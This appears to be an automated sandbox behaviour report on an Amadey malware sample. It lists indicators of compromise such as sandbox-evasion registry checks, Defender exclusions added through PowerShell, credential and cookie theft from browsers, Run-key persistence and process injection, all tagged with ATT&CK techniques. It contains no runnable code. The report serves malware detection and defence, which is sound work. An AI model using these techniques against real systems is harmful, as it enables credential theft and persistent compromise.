amadey | 5cf7751ea33057a39a353f34da5527940ef4a44a90262697b2ee7186b6d40749

Virtualization/Sandbox Evasion

credential_access stealer

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	5e58e6ca54.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	8f7a84c735.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	random.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe

Blocklisted process makes network request 5 IoCs

flow	pid	Process
52	5880	powershell.exe
254	5880	powershell.exe
329	5880	powershell.exe
371	5880	powershell.exe
427	5880	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
620	powershell.exe
12524	powershell.exe
6904	powershell.exe
5880	powershell.exe
7076	powershell.exe

Downloads MZ/PE file 19 IoCs

flow	pid	Process
332	6208	futors.exe
33	1168	rapes.exe
102	6208	futors.exe
102	6208	futors.exe
327	5216	MSBuild.exe
327	5216	MSBuild.exe
451	1168	rapes.exe
54	6208	futors.exe
453	12368	svchost.exe
21	1168	rapes.exe
347	5816	89r1ngvkng.exe
347	5816	89r1ngvkng.exe
362	1168	rapes.exe
362	1168	rapes.exe
37	1168	rapes.exe
167	6208	futors.exe
306	1168	rapes.exe
50	1168	rapes.exe
321	6208	futors.exe

Uses browser remote debugging 2 TTPs 23 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

Steal Web Session Cookie

T1539

Modify Authentication Process

pid	Process
6776	chrome.exe
5244	chrome.exe
1148	msedge.exe
9596	msedge.exe
10244	msedge.exe
11684	msedge.exe
5916	chrome.exe
5548	msedge.exe
5404	msedge.exe
20580	chrome.exe
21240	chrome.exe
10168	msedge.exe
4464	chrome.exe
6852	msedge.exe
4000	msedge.exe
20924	chrome.exe
20916	chrome.exe
10156	msedge.exe
5648	chrome.exe
21148	chrome.exe
9584	msedge.exe
10252	msedge.exe
11644	msedge.exe

Checks BIOS information in registry 2 TTPs 14 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	5e58e6ca54.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	8f7a84c735.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	8f7a84c735.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	random.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	random.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	5e58e6ca54.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	random.exe
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	rapes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	amnew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	futors.exe
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	9625e70c4a.exe
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	89r1ngvkng.exe

Drops startup file 3 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_0a521654.cmd	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_0a521654.cmd	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GoogleChrome.lnk	clLzVtQpT2xPX0V0.exe

Executes dropped EXE 47 IoCs

pid	Process
1168	rapes.exe
3492	RYZusWg.exe
6700	LJl8AAr.exe
7060	rapes.exe
5496	n0hEgR9.exe
2904	amnew.exe
6208	futors.exe
4200	v7942.exe
6336	IsValueCreated.exe
1552	alex12312321.exe
5296	legendarik.exe
2660	9625e70c4a.exe
6612	mTk60rz.exe
6552	ZSoeRVBe.exe
5496	crypted.exe
3988	Constraints.com
6072	rapes.exe
5272	futors.exe
632	5e58e6ca54.exe
4776	0r1vaa1no8.exe
5924	svchost015.exe
7068	89r1ngvkng.exe
5816	89r1ngvkng.exe
4960	asr1dbsjmy.exe
6360	s2gfK0OOpDvXgO4x.exe
5392	clLzVtQpT2xPX0V0.exe
16672	s2gfK0OOpDvXgO4x.exe
16700	7lbjR2suD8JTv0Zd.exe
22296	FkScDGW3CqUh.exe
22396	799zieDGb1Fh.exe
22196	brcUJVpwDfcW.exe
22216	YMauSAr.exe
22140	5KIImHRzgS0Hh1mH.exe
22080	YqBVrdm8vWYfrU4x.exe
18296	90d7518177.exe
18388	VrQSuEQ.exe
7068	9BHd1vZZWudjpitz.exe
17488	svchost015.exe
9460	wQI4o11.exe
10576	8f7a84c735.exe
10824	wQI4o11.exe
10856	8pg3R6AjxHpV7qLM.exe
11724	rapes.exe
11776	futors.exe
11908	VrQSuEQ.exe
12092	amnew.exe
12316	UZPt0hR.exe

Identifies Wine through registry keys 2 TTPs 7 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	5e58e6ca54.exe
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	8f7a84c735.exe
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	random.exe

Loads dropped DLL 47 IoCs

pid	Process
6552	ZSoeRVBe.exe
6552	ZSoeRVBe.exe
6552	ZSoeRVBe.exe
6552	ZSoeRVBe.exe
6552	ZSoeRVBe.exe
6552	ZSoeRVBe.exe
6552	ZSoeRVBe.exe
6552	ZSoeRVBe.exe
6552	ZSoeRVBe.exe
6552	ZSoeRVBe.exe
6552	ZSoeRVBe.exe
6552	ZSoeRVBe.exe
6552	ZSoeRVBe.exe
6552	ZSoeRVBe.exe
6552	ZSoeRVBe.exe
6552	ZSoeRVBe.exe
6552	ZSoeRVBe.exe
6552	ZSoeRVBe.exe
6552	ZSoeRVBe.exe
6552	ZSoeRVBe.exe
6552	ZSoeRVBe.exe
6552	ZSoeRVBe.exe
6552	ZSoeRVBe.exe
6552	ZSoeRVBe.exe
6552	ZSoeRVBe.exe
6552	ZSoeRVBe.exe
6552	ZSoeRVBe.exe
6552	ZSoeRVBe.exe
6552	ZSoeRVBe.exe
6552	ZSoeRVBe.exe
6552	ZSoeRVBe.exe
6552	ZSoeRVBe.exe
6552	ZSoeRVBe.exe
6552	ZSoeRVBe.exe
6552	ZSoeRVBe.exe
6552	ZSoeRVBe.exe
6552	ZSoeRVBe.exe
6552	ZSoeRVBe.exe
6552	ZSoeRVBe.exe
6552	ZSoeRVBe.exe
6552	ZSoeRVBe.exe
6552	ZSoeRVBe.exe
6552	ZSoeRVBe.exe
6552	ZSoeRVBe.exe
6552	ZSoeRVBe.exe
6552	ZSoeRVBe.exe
6552	ZSoeRVBe.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5e58e6ca54.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10052940101\\5e58e6ca54.exe"	futors.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleChrome = "C:\\Users\\Admin\\AppData\\Local\\Temp\\y1ETaysj\\s2gfK0OOpDvXgO4x.exe"	s2gfK0OOpDvXgO4x.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\90d7518177.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10052950101\\90d7518177.exe"	futors.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
355	ip-api.com

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
6196	tasklist.exe
1632	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs

pid	Process
4636	random.exe
1168	rapes.exe
7060	rapes.exe
6072	rapes.exe
632	5e58e6ca54.exe
10576	8f7a84c735.exe
11724	rapes.exe

Suspicious use of SetThreadContext 17 IoCs

description	pid	Process	procid_target
PID 6700 set thread context of 6748	6700	LJl8AAr.exe	100
PID 5496 set thread context of 4284	5496	n0hEgR9.exe	105
PID 4200 set thread context of 5216	4200	v7942.exe	122
PID 6336 set thread context of 5428	6336	IsValueCreated.exe	133
PID 1552 set thread context of 3940	1552	alex12312321.exe	136
PID 5296 set thread context of 4332	5296	legendarik.exe	139
PID 5496 set thread context of 996	5496	crypted.exe	171
PID 5428 set thread context of 5504	5428	MSBuild.exe	180
PID 4776 set thread context of 4852	4776	0r1vaa1no8.exe	188
PID 632 set thread context of 5924	632	5e58e6ca54.exe	189
PID 7068 set thread context of 5816	7068	89r1ngvkng.exe	191
PID 22296 set thread context of 22332	22296	FkScDGW3CqUh.exe	212
PID 22396 set thread context of 22428	22396	799zieDGb1Fh.exe	215
PID 18388 set thread context of 18404	18388	VrQSuEQ.exe	226
PID 18296 set thread context of 17488	18296	90d7518177.exe	228
PID 10824 set thread context of 11500	10824	wQI4o11.exe	272
PID 11908 set thread context of 11928	11908	VrQSuEQ.exe	278

Drops file in Windows directory 15 IoCs

description	ioc	Process
File opened for modification	C:\Windows\MadnessSet	9625e70c4a.exe
File opened for modification	C:\Windows\PolarRail	9625e70c4a.exe
File opened for modification	C:\Windows\AndorraPrint	9625e70c4a.exe
File opened for modification	C:\Windows\CongressJvc	9625e70c4a.exe
File opened for modification	C:\Windows\DealersFocuses	9625e70c4a.exe
File opened for modification	C:\Windows\AucklandChef	9625e70c4a.exe
File created	C:\Windows\Tasks\rapes.job	random.exe
File opened for modification	C:\Windows\ZuMiller	9625e70c4a.exe
File opened for modification	C:\Windows\LocksWisconsin	9625e70c4a.exe
File opened for modification	C:\Windows\LimeNirvana	9625e70c4a.exe
File opened for modification	C:\Windows\DependMedication	9625e70c4a.exe
File opened for modification	C:\Windows\ExceedExec	9625e70c4a.exe
File created	C:\Windows\Tasks\futors.job	amnew.exe
File opened for modification	C:\Windows\SyntheticLil	9625e70c4a.exe
File opened for modification	C:\Windows\NewcastlePeripherals	9625e70c4a.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 5 IoCs

pid	pid_target	Process	procid_target
16628	6360	WerFault.exe	195
17516	16700	WerFault.exe	203
18132	5924	WerFault.exe	189
18248	22080	WerFault.exe	219
9360	7068	WerFault.exe	227

System Location Discovery: System Language Discovery 1 TTPs 54 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5KIImHRzgS0Hh1mH.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wQI4o11.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	amnew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	futors.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	s2gfK0OOpDvXgO4x.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	s2gfK0OOpDvXgO4x.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5e58e6ca54.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	random.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Constraints.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	asr1dbsjmy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	90d7518177.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	amnew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7lbjR2suD8JTv0Zd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	YqBVrdm8vWYfrU4x.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	UZPt0hR.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extrac32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	brcUJVpwDfcW.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9BHd1vZZWudjpitz.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wQI4o11.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9625e70c4a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	clLzVtQpT2xPX0V0.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	8f7a84c735.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	8pg3R6AjxHpV7qLM.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe

Checks processor information in registry 2 TTPs 12 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	89r1ngvkng.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	MSBuild.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	MSBuild.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	89r1ngvkng.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	msedge.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
22220	timeout.exe

Enumerates system info in registry 2 TTPs 12 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	358	Go-http-client/1.1

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133883929006987237"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	msedge.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000_Classes\Local Settings	rapes.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-83325578-304917428-1200496059-1000\{5EC781B6-99AC-425C-90AA-9B808C5D7E67}	msedge.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
5880	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4636	random.exe
4636	random.exe
1168	rapes.exe
1168	rapes.exe
6748	MSBuild.exe
6748	MSBuild.exe
6748	MSBuild.exe
6748	MSBuild.exe
6904	powershell.exe
6904	powershell.exe
6904	powershell.exe
7060	rapes.exe
7060	rapes.exe
4284	MSBuild.exe
4284	MSBuild.exe
4284	MSBuild.exe
4284	MSBuild.exe
5880	powershell.exe
5880	powershell.exe
620	powershell.exe
620	powershell.exe
620	powershell.exe
5216	MSBuild.exe
5216	MSBuild.exe
5216	MSBuild.exe
5216	MSBuild.exe
6776	chrome.exe
6776	chrome.exe
3940	MSBuild.exe
3940	MSBuild.exe
3940	MSBuild.exe
3940	MSBuild.exe
4332	MSBuild.exe
4332	MSBuild.exe
4332	MSBuild.exe
4332	MSBuild.exe
5216	MSBuild.exe
5216	MSBuild.exe
5428	MSBuild.exe
5428	MSBuild.exe
5428	MSBuild.exe
5428	MSBuild.exe
5428	MSBuild.exe
5428	MSBuild.exe
5216	MSBuild.exe
5216	MSBuild.exe
5216	MSBuild.exe
5216	MSBuild.exe
5428	MSBuild.exe
5428	MSBuild.exe
5428	MSBuild.exe
7076	powershell.exe
7076	powershell.exe
7076	powershell.exe
996	MSBuild.exe
996	MSBuild.exe
996	MSBuild.exe
996	MSBuild.exe
5216	MSBuild.exe
5216	MSBuild.exe
3988	Constraints.com
3988	Constraints.com
3988	Constraints.com
3988	Constraints.com

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
12316	UZPt0hR.exe
12316	UZPt0hR.exe
12316	UZPt0hR.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 16 IoCs

pid	Process
6776	chrome.exe
6776	chrome.exe
6776	chrome.exe
6776	chrome.exe
6852	msedge.exe
6852	msedge.exe
6852	msedge.exe
6852	msedge.exe
20580	chrome.exe
20580	chrome.exe
20580	chrome.exe
20580	chrome.exe
9596	msedge.exe
9596	msedge.exe
9596	msedge.exe
9596	msedge.exe

Suspicious use of AdjustPrivilegeToken 42 IoCs

description	pid	Process
Token: SeDebugPrivilege	3492	RYZusWg.exe
Token: SeDebugPrivilege	6904	powershell.exe
Token: SeDebugPrivilege	5880	powershell.exe
Token: SeDebugPrivilege	620	powershell.exe
Token: SeDebugPrivilege	6336	IsValueCreated.exe
Token: SeShutdownPrivilege	6776	chrome.exe
Token: SeCreatePagefilePrivilege	6776	chrome.exe
Token: SeShutdownPrivilege	6776	chrome.exe
Token: SeCreatePagefilePrivilege	6776	chrome.exe
Token: SeShutdownPrivilege	6776	chrome.exe
Token: SeCreatePagefilePrivilege	6776	chrome.exe
Token: SeShutdownPrivilege	6776	chrome.exe
Token: SeCreatePagefilePrivilege	6776	chrome.exe
Token: SeShutdownPrivilege	6776	chrome.exe
Token: SeCreatePagefilePrivilege	6776	chrome.exe
Token: SeShutdownPrivilege	6776	chrome.exe
Token: SeCreatePagefilePrivilege	6776	chrome.exe
Token: SeShutdownPrivilege	6776	chrome.exe
Token: SeCreatePagefilePrivilege	6776	chrome.exe
Token: SeDebugPrivilege	5428	MSBuild.exe
Token: SeDebugPrivilege	6196	tasklist.exe
Token: SeDebugPrivilege	6552	ZSoeRVBe.exe
Token: SeDebugPrivilege	1632	tasklist.exe
Token: SeDebugPrivilege	7076	powershell.exe
Token: SeLockMemoryPrivilege	5504	AddInProcess.exe
Token: SeLockMemoryPrivilege	5504	AddInProcess.exe
Token: SeShutdownPrivilege	20580	chrome.exe
Token: SeCreatePagefilePrivilege	20580	chrome.exe
Token: SeShutdownPrivilege	20580	chrome.exe
Token: SeCreatePagefilePrivilege	20580	chrome.exe
Token: SeShutdownPrivilege	20580	chrome.exe
Token: SeCreatePagefilePrivilege	20580	chrome.exe
Token: SeShutdownPrivilege	20580	chrome.exe
Token: SeCreatePagefilePrivilege	20580	chrome.exe
Token: SeShutdownPrivilege	20580	chrome.exe
Token: SeCreatePagefilePrivilege	20580	chrome.exe
Token: SeShutdownPrivilege	20580	chrome.exe
Token: SeCreatePagefilePrivilege	20580	chrome.exe
Token: SeShutdownPrivilege	20580	chrome.exe
Token: SeCreatePagefilePrivilege	20580	chrome.exe
Token: SeDebugPrivilege	11500	RegAsm.exe
Token: SeDebugPrivilege	12524	powershell.exe

Suspicious use of FindShellTrayWindow 61 IoCs

pid	Process
4636	random.exe
6776	chrome.exe
6776	chrome.exe
6776	chrome.exe
6776	chrome.exe
6776	chrome.exe
6776	chrome.exe
6776	chrome.exe
6776	chrome.exe
6776	chrome.exe
6776	chrome.exe
6776	chrome.exe
6776	chrome.exe
6776	chrome.exe
6776	chrome.exe
6776	chrome.exe
6776	chrome.exe
6776	chrome.exe
6776	chrome.exe
6776	chrome.exe
6776	chrome.exe
